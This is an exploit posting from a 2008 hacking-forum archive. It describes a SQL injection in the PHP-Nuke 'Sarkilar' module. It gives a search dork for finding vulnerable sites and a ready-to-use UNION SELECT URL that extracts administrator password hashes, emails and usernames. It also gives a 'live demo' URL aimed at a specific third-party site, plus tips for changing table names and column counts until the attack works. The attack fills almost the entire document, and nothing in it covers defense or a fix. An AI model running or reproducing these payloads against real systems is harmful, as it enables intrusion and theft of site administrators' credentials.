Home / exploits phpnukesarkilar-sql.txt
Posted on 17 October 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -Jappan - beenu # #-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # # and all darkc0de and NikTrix members ---# ################################################################ # # Author: r45c4l (first noticed by echoll) # # Home : www.darkc0de.com & niktrix.info # # Email : r45c4l@hotmail.com # # Share the c0de! # ################################################################ # # Title: phpnuke module Sarkilar SQL Injection vulnerabilit # # ################################################################ # # d0rk : inurl:?name=Sarkilar # ################################################################ POC :- http://www.site.com/[path]/modules.php?name=Sarkilar&op=showcontent&id=-7+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+nuke_authors-- Live Dem0:- http://www.hebuname.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- Table names can be modified in some sites from nuke_authors to site_authors and in some case number of columns may also be diffrent than the above POC, so u can try to change it manually if the above POC shows any error. ########################################################### # # Bug discovered : 17 oct 2008 # ###########################################################
